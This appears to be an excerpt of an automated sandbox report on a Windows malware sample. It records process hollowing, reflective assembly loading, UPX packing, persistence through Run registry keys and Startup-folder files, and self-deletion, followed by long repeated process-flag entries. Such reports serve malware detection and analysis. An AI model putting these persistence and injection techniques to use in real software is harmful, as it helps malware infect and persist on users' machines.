        Source: Binary string: caspol.pdb source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000005.00000003.1426722472.0000000000651000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 0000000E.00000002.1683943094.000000000048D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1746893356.000000000061D000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000016.00000002.1869540964.000000000065D000.00000004.00000020.00020000.00000000.sdmp, iR2UtZj5vP.exe.1.dr, WindowsServices.exe.4.dr

        Data Obfuscation

        barindex
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_0040B0E0 push eax; ret 1_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_0040B0E0 push eax; ret 5_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_0040C074 push eax; iretd 14_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_0040B0E0 push eax; ret 14_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_0040C074 push eax; iretd 18_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_0040B0E0 push eax; ret 18_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_0040C074 push eax; iretd 22_2_0040C0C6
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_0040B0E0 push eax; ret 22_2_0040B10E
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile created: C:\Users\user\Desktop\iR2UtZj5vP.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile created: C:\Users\user\Desktop\iR2UtZj5vP.exex (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile deleted: c:\users\user\desktop\ir2utzj5vp.exeJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,LPtoDP,GetMapMode,DPtoLP,GetWindowRect,1_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,LPtoDP,GetMapMode,DPtoLP,GetWindowRect,5_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,14_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,18_2_0040A440
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_0040A440 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,CreateCompatibleDC,LPtoDP,CreateCompatibleBitmap,GetMapMode,DPtoLP,GetWindowRect,BitBlt,22_2_0040A440
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
